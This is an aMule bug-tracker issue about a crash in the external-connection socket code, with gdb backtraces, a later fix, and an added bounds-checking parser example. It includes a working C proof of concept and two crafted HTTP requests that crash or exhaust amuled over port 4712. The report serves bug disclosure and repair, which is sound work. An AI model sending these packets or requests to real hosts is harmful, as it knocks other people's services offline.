aMule Bug Tracker - aMule
View Issue Details
ID: 0000669
Project: aMule
Category: External Conn
View Status: public
Date Submitted: 2005-11-27 17:58
Last Update: 2008-02-24 01:46
Reporter: ced
Assigned To: GonoszTopi
Priority: urgent
Severity: major
Reproducibility: always
Status: resolved
Resolution: fixed
Platform: Slackware 10.2
OS: Linux
OS Version: 2.4.31
Product Version: SVN

0000669: ECSocket bug
Bug when connecting to the external connection port with special requests. Here is the code to reproduce the bug:
/*
    Bug in ECSocket code

    - aMule-2.0.3:
    amuled segfaults

    - aMule-CVS-20051127:
    enters an infinite error loop after the socket 10 sec timeout
    (ECSocket error: Invalid socket (uninitialized)).
    webserver and amulecmd segfault when you connect
    to the external connection port.
    Amuled doesn't crash but is seriously disturbed.
    Probably buggy on previous cvs versions but not tested.
 */

#include <stdio.h>
#include <string.h>      /* memset, memcpy, strcat, strlen */
#include <unistd.h>      /* close */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr */

int main(int argc, char **argv)
{
    struct sockaddr_in to;
    char buf[8];

    int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock < 0) {
        perror("socket");
        return -1;
    }

    /* external connection (EC) port of the amuled host, 4712 by default */
    memset(&to, 0, sizeof(to));
    to.sin_addr.s_addr = inet_addr("192.168.0.1");
    to.sin_port = htons(4712);
    to.sin_family = AF_INET;

    if (connect(sock, (const struct sockaddr *)&to, sizeof(to)) < 0) {
        perror("connect");
        return -1;
    }

    /* buf becomes the 5 bytes "\x01ed2k" (NUL-terminated, fits in 8) */
    memset(buf, 0, 8);
    memcpy(buf, "\x01", 1);
    strcat(buf, "ed2k");

    /* one byte 0x20 (seen as flags = 32 in the backtrace), then the buffer */
    send(sock, "\x20", 1, 0);
    send(sock, buf, strlen(buf), 0);

    close(sock);

    return 0;
}
I confirm this always happens on my system when I connect remotely with the sample code. Can anyone confirm this bug?
No tags attached.
Issue History
2005-11-27 17:58 | ced | New Issue
2005-11-27 18:00 | ced | Note Added: 0001517
2005-11-27 19:18 | ced | Note Added: 0001518
2005-11-27 21:08 | GonoszTopi | Assigned To => GonoszTopi
2005-11-27 21:08 | GonoszTopi | Priority: normal => urgent
2005-11-27 21:08 | GonoszTopi | Status: new => acknowledged
2005-11-27 21:08 | GonoszTopi | Projection: none => minor fix
2005-11-27 21:08 | GonoszTopi | ETA: none => < 1 day
2005-11-27 22:57 | GonoszTopi | Status: acknowledged => resolved
2005-11-27 22:57 | GonoszTopi | Resolution: open => fixed
2005-12-03 02:17 | ced | Status: resolved => feedback
2005-12-03 02:17 | ced | Resolution: fixed => reopened
2005-12-03 02:17 | ced | Note Added: 0001538
2005-12-04 19:32 | GonoszTopi | Status: feedback => acknowledged
2005-12-04 19:32 | GonoszTopi | Projection: minor fix => none
2005-12-04 19:32 | GonoszTopi | ETA: < 1 day => none
2006-03-24 13:49 | Xaignar | Note Added: 0001927
2008-02-24 01:46 | Xaignar | Status: acknowledged => resolved
2008-02-24 01:46 | Xaignar | Resolution: reopened => fixed

Notes
(0001517)
ced   
2005-11-27 18:00   
(0001518)
ced   
2005-11-27 19:18   
Backtrace for amule-2.0.3

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 7247)]
0x403e165f in memcpy () from /lib/libc.so.6
(gdb) bt
#0 0x403e165f in memcpy () from /lib/libc.so.6
#1 0x080ab094 in ECSocket::ReadBuffer (this=0x9584d60, buffer=0x4096b008, len=1278269979) at ECSocket.cpp:459
#2 0x080ad55c in CECTag (this=0xbffff3a0, socket=@0x9584d60) at ECPacket.cpp:436
#3 0x080ad75e in CECTag::ReadChildren (this=0xbffff440, socket=@0x9584d60) at ECPacket.cpp:483
#4 0x080ad4f0 in CECTag (this=0xbffff440, socket=@0x9584d60) at ECPacket.cpp:428
#5 0x080ad75e in CECTag::ReadChildren (this=0xbffff4e0, socket=@0x9584d60) at ECPacket.cpp:483
#6 0x080ad4f0 in CECTag (this=0xbffff4e0, socket=@0x9584d60) at ECPacket.cpp:428
#7 0x080ad75e in CECTag::ReadChildren (this=0x95a6b30, socket=@0x9584d60) at ECPacket.cpp:483
#8 0x080adbb3 in CECPacket (this=0x95a6b30, socket=@0x9584d60) at ECPacket.cpp:728
#9 0x080ab8f5 in ECSocket::ReadPacket (this=0x9584d60) at ECSocket.cpp:691
#10 0x080c7f1b in ExternalConn::OnSocketEvent (this=0x9457a18, event=@0x9668a98) at ExternalConn.cpp:149
#11 0x400db5f7 in wxAppConsole::HandleEvent () from /usr/lib/libwx_base-2.6.so.0
#12 0x40186e70 in wxEvtHandler::ProcessEventIfMatches () from /usr/lib/libwx_base-2.6.so.0
#13 0x401862df in wxEventHashTable::HandleEvent () from /usr/lib/libwx_base-2.6.so.0
#14 0x40187010 in wxEvtHandler::ProcessEvent () from /usr/lib/libwx_base-2.6.so.0
#15 0x40186db6 in wxEvtHandler::ProcessPendingEvents () from /usr/lib/libwx_base-2.6.so.0
#16 0x400db579 in wxAppConsole::ProcessPendingEvents () from /usr/lib/libwx_base-2.6.so.0
#17 0x080645d6 in CamuleDaemonApp::OnRun (this=0x84145d8) at amuled.cpp:397
#18 0x40120fa8 in wxEntry () from /usr/lib/libwx_base-2.6.so.0
#19 0x08063678 in main (argc=1, argv=0xbffff7f4) at amuled.cpp:124
(gdb) bt full
#0 0x403e165f in memcpy () from /lib/libc.so.6
No symbol table info available.
#1 0x080ab094 in ECSocket::ReadBuffer (this=0x9584d60, buffer=0x4096b008, len=1278269979) at ECSocket.cpp:459
No locals.
#2 0x080ad55c in CECTag (this=0xbffff3a0, socket=@0x9584d60) at ECPacket.cpp:436
No locals.
#3 0x080ad75e in CECTag::ReadChildren (this=0xbffff440, socket=@0x9584d60) at ECPacket.cpp:483
        i = 0
        tmp_tagCount = 13584
#4 0x080ad4f0 in CECTag (this=0xbffff440, socket=@0x9584d60) at ECPacket.cpp:428
No locals.
#5 0x080ad75e in CECTag::ReadChildren (this=0xbffff4e0, socket=@0x9584d60) at ECPacket.cpp:483
        i = 0
        tmp_tagCount = 47990
#6 0x080ad4f0 in CECTag (this=0xbffff4e0, socket=@0x9584d60) at ECPacket.cpp:428
No locals.
#7 0x080ad75e in CECTag::ReadChildren (this=0x95a6b30, socket=@0x9584d60) at ECPacket.cpp:483
        i = 1
        tmp_tagCount = 25956
#8 0x080adbb3 in CECPacket (this=0x95a6b30, socket=@0x9584d60) at ECPacket.cpp:728
No locals.
#9 0x080ab8f5 in ECSocket::ReadPacket (this=0x9584d60) at ECSocket.cpp:691
        flags = 32
        p = (class CECPacket *) 0x0
#10 0x080c7f1b in ExternalConn::OnSocketEvent (this=0x9457a18, event=@0x9668a98) at ExternalConn.cpp:149
        sock = (class ECSocket *) 0x9584d60
        request = (class CECPacket *) 0x0
        response = (class CECPacket *) 0x0
#11 0x400db5f7 in wxAppConsole::HandleEvent () from /usr/lib/libwx_base-2.6.so.0
No symbol table info available.
#12 0x40186e70 in wxEvtHandler::ProcessEventIfMatches () from /usr/lib/libwx_base-2.6.so.0
No symbol table info available.
#13 0x401862df in wxEventHashTable::HandleEvent () from /usr/lib/libwx_base-2.6.so.0
No symbol table info available.
#14 0x40187010 in wxEvtHandler::ProcessEvent () from /usr/lib/libwx_base-2.6.so.0
No symbol table info available.
#15 0x40186db6 in wxEvtHandler::ProcessPendingEvents () from /usr/lib/libwx_base-2.6.so.0
No symbol table info available.
#16 0x400db579 in wxAppConsole::ProcessPendingEvents () from /usr/lib/libwx_base-2.6.so.0
No symbol table info available.
#17 0x080645d6 in CamuleDaemonApp::OnRun (this=0x84145d8) at amuled.cpp:397
No locals.
#18 0x40120fa8 in wxEntry () from /usr/lib/libwx_base-2.6.so.0
No symbol table info available.
#19 0x08063678 in main (argc=1, argv=0xbffff7f4) at amuled.cpp:124
No locals.
(gdb) thread apply all bt

Thread 4 (Thread 32771 (LWP 7253)):
#0 0x4002f186 in nanosleep () from /lib/libpthread.so.0
#1 0x00000000 in ?? ()
#2 0x4018b42a in wxMicroSleep () from /usr/lib/libwx_base-2.6.so.0
#3 0x4018b465 in wxMilliSleep () from /usr/lib/libwx_base-2.6.so.0
#4 0x4018376f in wxThread::Sleep () from /usr/lib/libwx_base-2.6.so.0
#5 0x08171606 in CTimer::CTimerThread::Entry (this=0x841b0e0) at Timer.cpp:100
#6 0x4018314b in wxThreadInternal::PthreadStart () from /usr/lib/libwx_base-2.6.so.0
#7 0x4018301f in wxPthreadStart () from /usr/lib/libwx_base-2.6.so.0
#8 0x400294eb in pthread_start_thread () from /lib/libpthread.so.0
#9 0x4002957f in pthread_start_thread_event () from /lib/libpthread.so.0
#10 0x4042fb0a in clone () from /lib/libc.so.6

Thread 2 (Thread 32769 (LWP 7250)):
#0 0x404272da in poll () from /lib/libc.so.6
#1 0x40028990 in __pthread_manager () from /lib/libpthread.so.0
#2 0x40028bb7 in __pthread_manager_event () from /lib/libpthread.so.0
#3 0x4042fb0a in clone () from /lib/libc.so.6

Thread 1 (Thread 16384 (LWP 7247)):
#0 0x403e165f in memcpy () from /lib/libc.so.6
#1 0x080ab094 in ECSocket::ReadBuffer (this=0x9584d60, buffer=0x4096b008, len=1278269979) at ECSocket.cpp:459
#2 0x080ad55c in CECTag (this=0xbffff3a0, socket=@0x9584d60) at ECPacket.cpp:436
#3 0x080ad75e in CECTag::ReadChildren (this=0xbffff440, socket=@0x9584d60) at ECPacket.cpp:483
#4 0x080ad4f0 in CECTag (this=0xbffff440, socket=@0x9584d60) at ECPacket.cpp:428
#5 0x080ad75e in CECTag::ReadChildren (this=0xbffff4e0, socket=@0x9584d60) at ECPacket.cpp:483
#6 0x080ad4f0 in CECTag (this=0xbffff4e0, socket=@0x9584d60) at ECPacket.cpp:428
#7 0x080ad75e in CECTag::ReadChildren (this=0x95a6b30, socket=@0x9584d60) at ECPacket.cpp:483
#8 0x080adbb3 in CECPacket (this=0x95a6b30, socket=@0x9584d60) at ECPacket.cpp:728
#9 0x080ab8f5 in ECSocket::ReadPacket (this=0x9584d60) at ECSocket.cpp:691
#10 0x080c7f1b in ExternalConn::OnSocketEvent (this=0x9457a18, event=@0x9668a98) at ExternalConn.cpp:149
#11 0x400db5f7 in wxAppConsole::HandleEvent () from /usr/lib/libwx_base-2.6.so.0
#12 0x40186e70 in wxEvtHandler::ProcessEventIfMatches () from /usr/lib/libwx_base-2.6.so.0
#13 0x401862df in wxEventHashTable::HandleEvent () from /usr/lib/libwx_base-2.6.so.0
#14 0x40187010 in wxEvtHandler::ProcessEvent () from /usr/lib/libwx_base-2.6.so.0
#15 0x40186db6 in wxEvtHandler::ProcessPendingEvents () from /usr/lib/libwx_base-2.6.so.0
#16 0x400db579 in wxAppConsole::ProcessPendingEvents () from /usr/lib/libwx_base-2.6.so.0
#17 0x080645d6 in CamuleDaemonApp::OnRun (this=0x84145d8) at amuled.cpp:397
#18 0x40120fa8 in wxEntry () from /usr/lib/libwx_base-2.6.so.0
#19 0x08063678 in main (argc=1, argv=0xbffff7f4) at amuled.cpp:124
(0001538)
ced   
2005-12-03 02:17   
Bugs reproduce on amule-cvs (20051202):

The requests are funny; other random data could lead to the same results or crash amuled.


This request makes communication with port 4712 unavailable (amulecmd and amuleweb segfault):
http://192.168.0.1:4712/if(this->request){packet_data=schmilblick;}else{packet_data=NULL;}return;
Amuled debug messages:
ZLib operation returned Z_DATA_ERROR
ZLib error message: incorrect header check
zstream state:
        next_in=0x993662a
        avail_in=506
        total_in=2
        next_out=0x993e630
        avail_out=32768
        total_out=0
CECSocket error: Invalid socket (uninitialized)
CECSocket error: Invalid socket (uninitialized)
CECSocket error: Invalid socket (uninitialized)


This request causes amuled to consume a lot of memory and CPU time:
http://192.168.0.1:4712/if(this->
After 2 minutes (depending on the memory capacity of the system), launch the request one more time
and port 4712 is unavailable; CPU time usage increases.
----------------------------------------------
Amuled debug messages after the first request:
ZLib operation returned Z_DATA_ERROR
ZLib error message: incorrect header check
zstream state:
        next_in=0x9764e32
        avail_in=440
        total_in=2
        next_out=0x976d008
        avail_out=32768
        total_out=0
CECSocket error: Invalid socket (uninitialized)
-----------------------------------------------
Amuled debug messages after the second request:
ZLib operation returned Z_DATA_ERROR
ZLib error message: incorrect header check
zstream state:
        next_in=0x40b89de2
        avail_in=440
        total_in=2
        next_out=0x40b91de8
        avail_out=32768
        total_out=0
CECSocket error: Invalid socket (uninitialized)
CECSocket error: Invalid socket (uninitialized)
CECSocket error: Invalid socket (uninitialized)
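The backtrace in note 0001518 shows ECSocket::ReadBuffer entered with len=1278269979 and CECTag::ReadChildren looping over tmp_tagCount values in the tens of thousands, i.e. length and count fields taken from the connection and acted on before any check that that many bytes actually arrived, which is how a few bytes from an unauthenticated client become a memcpy crash, or, as the follow-up note describes, runaway memory and CPU use. The block below is an added example written for this page; it is not aMule code and the layout it parses is an assumption, not the EC wire format. It reads a toy nested tag stream (assumed layout: u16 name, u32 payload length, u16 child count, then the children, then the payload) through a reader that validates every length and count against the bytes actually buffered, with constructed limits kMaxChildren and kMaxDepth, and it refuses the backtrace's values before allocating or copying anything. The sample streams are constructed, not captured traffic.

```cpp
#include <cstdint>
#include <cstring>
#include <iostream>
#include <stdexcept>
#include <string>
#include <vector>

// Limits are constructed for this example; a real parser derives them from its spec.
static const size_t kMaxChildren = 256;
static const unsigned kMaxDepth = 8;

struct Tag {
    uint16_t name = 0;
    std::vector<uint8_t> payload;
    std::vector<Tag> children;
};

// Cursor over a received buffer. Every read compares the requested size with
// what is really present before touching memory, so a wire-supplied length
// (like len=1278269979 in the backtrace) can never reach memcpy unchecked.
class BoundedReader {
public:
    BoundedReader(const uint8_t* data, size_t size) : p_(data), end_(data + size) {}
    size_t remaining() const { return static_cast<size_t>(end_ - p_); }

    void readBytes(uint8_t* dst, size_t n) {
        if (n > remaining())
            throw std::runtime_error("length " + std::to_string(n) + " exceeds " +
                                     std::to_string(remaining()) + " buffered bytes");
        std::memcpy(dst, p_, n);
        p_ += n;
    }
    uint16_t readU16() {
        uint8_t b[2];
        readBytes(b, 2);
        return static_cast<uint16_t>((b[0] << 8) | b[1]);
    }
    uint32_t readU32() {
        uint8_t b[4];
        readBytes(b, 4);
        return (uint32_t(b[0]) << 24) | (uint32_t(b[1]) << 16) | (uint32_t(b[2]) << 8) | b[3];
    }
private:
    const uint8_t* p_;
    const uint8_t* end_;
};

// Assumed layout: u16 name | u32 payload_len | u16 child_count | children | payload.
// Depth is capped because the backtrace shows unbounded CECTag -> ReadChildren recursion.
Tag readTag(BoundedReader& r, unsigned depth) {
    if (depth > kMaxDepth) throw std::runtime_error("nesting deeper than " + std::to_string(kMaxDepth));
    Tag t;
    t.name = r.readU16();
    uint32_t len = r.readU32();
    uint16_t count = r.readU16();
    // Reject before allocating: a count or length from the peer must not drive memory use.
    if (count > kMaxChildren)
        throw std::runtime_error("child count " + std::to_string(count) + " exceeds limit " +
                                 std::to_string(kMaxChildren));
    if (len > r.remaining())
        throw std::runtime_error("payload length " + std::to_string(len) + " exceeds " +
                                 std::to_string(r.remaining()) + " buffered bytes");
    t.children.reserve(count);
    for (uint16_t i = 0; i < count; ++i) t.children.push_back(readTag(r, depth + 1));
    t.payload.resize(len);
    if (len) r.readBytes(t.payload.data(), len);  // re-checked: children consumed bytes
    return t;
}

// Parses one complete tag; returns "ok" or the reason the input was rejected.
std::string parseResult(const std::vector<uint8_t>& bytes) {
    try {
        BoundedReader r(bytes.data(), bytes.size());
        readTag(r, 0);
        return r.remaining() == 0 ? "ok" : "trailing bytes";
    } catch (const std::exception& e) {
        return e.what();
    }
}

// Constructed sample streams (big-endian encoders, not captured traffic).
static void putU16(std::vector<uint8_t>& v, uint16_t x) { v.push_back(uint8_t(x >> 8)); v.push_back(uint8_t(x)); }
static void putU32(std::vector<uint8_t>& v, uint32_t x) { for (int s = 24; s >= 0; s -= 8) v.push_back(uint8_t(x >> s)); }

// Well-formed: a parent with no payload and one child carrying the 4 bytes "ed2k".
std::vector<uint8_t> goodStream() {
    std::vector<uint8_t> v;
    putU16(v, 0x0001); putU32(v, 0); putU16(v, 1);
    putU16(v, 0x0002); putU32(v, 4); putU16(v, 0);
    const uint8_t payload[4] = {'e', 'd', '2', 'k'};
    v.insert(v.end(), payload, payload + 4);
    return v;
}
// Announces the backtrace's payload length (1278269979) but sends a single byte.
std::vector<uint8_t> oversizedLengthStream() {
    std::vector<uint8_t> v;
    putU16(v, 0x0001); putU32(v, 1278269979u); putU16(v, 0);
    v.push_back('x');
    return v;
}
// Announces 47990 children (another backtrace value) with nothing behind them.
std::vector<uint8_t> hugeChildCountStream() {
    std::vector<uint8_t> v;
    putU16(v, 0x0001); putU32(v, 0); putU16(v, 47990);
    return v;
}

int main() {
    std::cout << "well-formed:      " << parseResult(goodStream()) << "\n";
    std::cout << "oversized length: " << parseResult(oversizedLengthStream()) << "\n";
    std::cout << "huge child count: " << parseResult(hugeChildCountStream()) << "\n";
    return 0;
}
```

The point of the structure is that the cursor, not the caller, owns the bounds: a parser written this way cannot be talked into copying more than it holds, and capping child count and depth keeps a short hostile packet from translating into large allocations or deep recursion, which is the failure mode the reporter's second note describes.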
(0001927)
Xaignar   
2006-03-24 13:49   
This no longer seems to happen in 2.1.x and CVS.